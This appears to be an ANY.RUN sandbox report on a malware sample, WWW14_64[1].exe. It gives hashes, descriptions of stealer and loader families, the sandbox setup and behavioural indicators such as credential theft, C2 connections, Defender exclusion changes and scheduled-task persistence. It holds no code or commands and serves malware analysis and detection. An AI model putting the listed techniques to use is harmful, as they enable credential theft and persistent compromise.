Malware analysis WWW14_64[1].exe Malicious activity | ANY.RUN

Add for printing

File name:	WWW14_64[1].exe
Full analysis:	https://app.any.run/tasks/5b4d5467-f4f9-46da-8c44-82a9dffe4c55
Verdict:	Malicious activity
Threats:	Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. Fabookie is an infostealer malware that was first observed as early as October 2021. The threat is known for targeting account credentials of Facebook users. The collected information is then sold by the attackers to other criminals. Fabookie is often distributed via loaders such as SmokeLoader. GCleaner is a type of malware loader that has the capability to deliver numerous malicious software programs, which differ based on the location of the targeted victim. This malware is commonly spread through fraudulent websites that advertise free PC optimization tools A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. PrivateLoader is a malware family that is specifically created to infect computer systems and drop additional malicious programs. It operates using a pay-per-install business model, which means that the individuals behind it are paid for each instance of successful deployment of different types of harmful programs, including trojans, stealers, and other ransomware. Raccoon is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. RedLine Stealer is a malicious program that collects users’ confidential data from browsers, systems, and installed software. It also infects operating systems with other malware. The main function of Smoke Loader is dropping other, more destructive malware on infected machines. However, unlike many competing loaders, this one can be extended via plugins to feature destructive, malicious info-stealing functions. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Vidar is a dangerous malware that steals information and cryptocurrency from infected users. It derives its name from the ancient Scandinavian god of Vengeance. This stealer has been terrorizing the internet since 2018. Malware Trends Tracker >>>
Analysis date:	June 19, 2023, 19:06:53
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	privateloader evasion opendir loader fabookie rat redline amadey trojan gcleaner raccoon recordbreaker stealer smoke vidar g0njxa
Indicators:
MIME:	application/x-dosexec
File info:	PE32+ executable (GUI) x86-64, for MS Windows
MD5:	57494E075F2DB4E3B06F1772A106D1AA
SHA1:	A5B116F5801BD1ADAD5ADC4F8DA68AAAAE565C98
SHA256:	0A0C50DBC5D0C9811BFD0552DDD075E0E1DF2CF07049CC546E41F9BF08CB8290
SSDEEP:	98304:qoqwCSVZ/CBn6VqfRPsFfk/2LwgJzCpyUmdD3WV6O90dEC6KZ6YolvgFI48gQdz7:hqYVCBn6oJefe2LZzAm66jX/FAgW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 67.0.4 (x64 en-US) (67.0.4)
Mozilla Maintenance Service (67.0.4)
Notepad++ (64-bit x64) (7.5.1)
Opera 12.15 (12.15.1748)
Skype™ 7.39 (7.39.102)
Update for Microsoft .NET Framework 4.7.1 (KB4054852) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Creates a writable file the system directory
  - WWW14_64[1].exe (PID: 3020)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - iQegscw.exe (PID: 2136)
- Actions looks like stealing of personal data
  - WWW14_64[1].exe (PID: 3020)
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - ss41.exe (PID: 2816)
  - aOu2C.exe (PID: 2032)
  - WeUOGHq.exe (PID: 2660)
  - RegSvcs.exe (PID: 1776)
  - iQegscw.exe (PID: 2136)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - OLyqnVbF.exe (PID: 2236)
- PRIVATELOADER was detected
  - WWW14_64[1].exe (PID: 3020)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
- Connects to the CnC server
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - oneetx.exe (PID: 2880)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - ss41.exe (PID: 2816)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - Rec619.exe (PID: 2940)
  - aOu2C.exe (PID: 2032)
  - RegSvcs.exe (PID: 1776)
  - explorer.exe (PID: 1960)
- Application was dropped or rewritten from another process
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - nQ2McWUAX9KJf6qCzwXYqN1T.exe (PID: 968)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - yB5qNHqacgsT4DPHSAOjLFqT.exe (PID: 1788)
  - IZfNITzXXVGKJ4hJs21Ql_MK.exe (PID: 1400)
  - Install.exe (PID: 1032)
  - 35abf1e3.exe (PID: 2868)
  - ss41.exe (PID: 972)
  - newplayer.exe (PID: 2496)
  - Install.exe (PID: 2704)
  - oneetx.exe (PID: 2880)
  - oneetx.exe (PID: 2460)
  - ss41.exe (PID: 2816)
  - lSbth8S3.exe (PID: 600)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - tP7uGPGB.exe (PID: 1840)
  - oneetx.exe (PID: 2624)
  - WeUOGHq.exe (PID: 2660)
  - iQegscw.exe (PID: 2136)
  - oneetx.exe (PID: 3068)
- Steals credentials from Web Browsers
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - RegSvcs.exe (PID: 1776)
  - WeUOGHq.exe (PID: 2660)
  - OLyqnVbF.exe (PID: 2236)
  - iQegscw.exe (PID: 2136)
- Loads dropped or rewritten executable
  - is-1SI1D.tmp (PID: 2680)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - rundll32.exe (PID: 868)
- Changes the autorun value in the registry
  - oneetx.exe (PID: 2880)
- Uses Task Scheduler to run other applications
  - oneetx.exe (PID: 2880)
  - Install.exe (PID: 2704)
  - WeUOGHq.exe (PID: 2660)
  - iQegscw.exe (PID: 2136)
  - rundll32.exe (PID: 868)
- FABOOKIE was detected
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - ss41.exe (PID: 2816)
- Application was injected by another process
  - explorer.exe (PID: 1960)
- Runs injected code in another process
  - 35abf1e3.exe (PID: 2868)
- AMADEY was detected
  - oneetx.exe (PID: 2880)
- REDLINE was detected
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - RegSvcs.exe (PID: 1776)
- Run PowerShell with an invisible window
  - powershell.EXE (PID: 2068)
  - powershell.EXE (PID: 2100)
- PRIVATELOADER detected by memory dumps
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
- GCLEANER was detected
  - Rec619.exe (PID: 2940)
- RACCOON was detected
  - aOu2C.exe (PID: 2032)
- REDLINE detected by memory dumps
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - tP7uGPGB.exe (PID: 1840)
- Steals credentials
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
- Starts CMD.EXE for self-deleting
  - Rec619.exe (PID: 2940)
- Modifies exclusions in Windows Defender
  - reg.exe (PID: 1460)
- Uses Task Scheduler to autorun other applications
  - iQegscw.exe (PID: 2136)
- SMOKE was detected
  - explorer.exe (PID: 1960)
- Unusual connection from system programs
  - rundll32.exe (PID: 868)
- AMADEY detected by memory dumps
  - oneetx.exe (PID: 2880)
- Modifies files in the Chrome extension folder
  - iQegscw.exe (PID: 2136)
SUSPICIOUS
- Reads settings of System Certificates
  - WWW14_64[1].exe (PID: 3020)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - OLyqnVbF.exe (PID: 2236)
- Connects to the server without a host name
  - WWW14_64[1].exe (PID: 3020)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - oneetx.exe (PID: 2880)
  - Rec619.exe (PID: 2940)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
- Checks for external IP
  - WWW14_64[1].exe (PID: 3020)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
- Adds/modifies Windows certificates
  - explorer.exe (PID: 1960)
  - Rec619.exe (PID: 2940)
- Reads security settings of Internet Explorer
  - WWW14_64[1].exe (PID: 3020)
  - OLyqnVbF.exe (PID: 2236)
- Checks Windows Trust Settings
  - WWW14_64[1].exe (PID: 3020)
  - OLyqnVbF.exe (PID: 2236)
  - iQegscw.exe (PID: 2136)
- Executes as Windows Service
  - raserver.exe (PID: 2400)
  - raserver.exe (PID: 2968)
  - raserver.exe (PID: 1480)
  - raserver.exe (PID: 2740)
- Reads the Internet Settings
  - WWW14_64[1].exe (PID: 3020)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - newplayer.exe (PID: 2496)
  - oneetx.exe (PID: 2880)
  - Install.exe (PID: 2704)
  - ss41.exe (PID: 2816)
  - powershell.EXE (PID: 2068)
  - Rec619.exe (PID: 2940)
  - explorer.exe (PID: 1960)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - RegSvcs.exe (PID: 1776)
  - powershell.EXE (PID: 2100)
- Executable content was dropped or overwritten
  - WWW14_64[1].exe (PID: 3020)
  - yB5qNHqacgsT4DPHSAOjLFqT.exe (PID: 1788)
  - is-1SI1D.tmp (PID: 2680)
  - IZfNITzXXVGKJ4hJs21Ql_MK.exe (PID: 1400)
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - Install.exe (PID: 1032)
  - newplayer.exe (PID: 2496)
  - oneetx.exe (PID: 2880)
  - Rec619.exe (PID: 2940)
  - explorer.exe (PID: 1960)
  - Install.exe (PID: 2704)
  - aOu2C.exe (PID: 2032)
  - OLyqnVbF.exe (PID: 2236)
  - WeUOGHq.exe (PID: 2660)
  - iQegscw.exe (PID: 2136)
- Process requests binary or script from the Internet
  - WWW14_64[1].exe (PID: 3020)
  - oneetx.exe (PID: 2880)
  - aOu2C.exe (PID: 2032)
- Reads the Windows owner or organization settings
  - is-1SI1D.tmp (PID: 2680)
- Uses TASKKILL.EXE to kill Browsers
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - ss41.exe (PID: 2816)
- Starts itself from another location
  - IZfNITzXXVGKJ4hJs21Ql_MK.exe (PID: 1400)
  - newplayer.exe (PID: 2496)
- Reads Microsoft Outlook installation path
  - Rec619.exe (PID: 2940)
- Reads browser cookies
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - RegSvcs.exe (PID: 1776)
- Starts CMD.EXE for commands execution
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - oneetx.exe (PID: 2880)
  - cmd.exe (PID: 2992)
  - forfiles.exe (PID: 272)
  - forfiles.exe (PID: 1700)
  - Rec619.exe (PID: 2940)
  - WeUOGHq.exe (PID: 2660)
  - iQegscw.exe (PID: 2136)
- Reads the BIOS version
  - Install.exe (PID: 2704)
- Application launched itself
  - cmd.exe (PID: 2992)
- Found strings related to reading or modifying Windows Defender settings
  - forfiles.exe (PID: 1700)
  - forfiles.exe (PID: 272)
  - WeUOGHq.exe (PID: 2660)
  - iQegscw.exe (PID: 2136)
- Uses ICACLS.EXE to modify access control lists
  - cmd.exe (PID: 2992)
- Uses REG/REGEDIT.EXE to modify registry
  - cmd.exe (PID: 1984)
  - cmd.exe (PID: 2756)
  - cmd.exe (PID: 1280)
  - cmd.exe (PID: 2652)
  - cmd.exe (PID: 2580)
  - cmd.exe (PID: 1980)
  - wscript.exe (PID: 2176)
  - cmd.exe (PID: 2664)
  - cmd.exe (PID: 1072)
  - cmd.exe (PID: 1700)
  - cmd.exe (PID: 2244)
- The process executes via Task Scheduler
  - oneetx.exe (PID: 2460)
  - powershell.EXE (PID: 2068)
  - WeUOGHq.exe (PID: 2660)
  - oneetx.exe (PID: 2624)
  - powershell.EXE (PID: 2100)
  - iQegscw.exe (PID: 2136)
  - rundll32.exe (PID: 1656)
  - oneetx.exe (PID: 3068)
- Connects to unusual port
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - RegSvcs.exe (PID: 1776)
- Searches for installed software
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - aOu2C.exe (PID: 2032)
  - RegSvcs.exe (PID: 1776)
  - OLyqnVbF.exe (PID: 2236)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)_update
  - OLyqnVbF.exe (PID: 2236)
- Uses TASKKILL.EXE to kill process
  - cmd.exe (PID: 696)
INFO
- Checks supported languages
  - WWW14_64[1].exe (PID: 3020)
  - IJv6tM9evUZDyltqQSbgvXrY.exe (PID: 1460)
  - aKcLQTKe7Jo2dXeswsiTr0G9.exe (PID: 1612)
  - nQ2McWUAX9KJf6qCzwXYqN1T.exe (PID: 968)
  - Y2HOjH0snBs3RXz7lVECiUxD.exe (PID: 1252)
  - yB5qNHqacgsT4DPHSAOjLFqT.exe (PID: 1788)
  - FRZtC1UE1QkxZFvXULsFUiqN.exe (PID: 2472)
  - xYnUz2QC_ocIkOYsP8huHqbV.exe (PID: 2024)
  - IZfNITzXXVGKJ4hJs21Ql_MK.exe (PID: 1400)
  - s53TbIRlo6ut4SLgw6cPZZuA.exe (PID: 1596)
  - is-1SI1D.tmp (PID: 2680)
  - Install.exe (PID: 1032)
  - Rec619.exe (PID: 2940)
  - newplayer.exe (PID: 2496)
  - 35abf1e3.exe (PID: 2868)
  - Install.exe (PID: 2704)
  - oneetx.exe (PID: 2880)
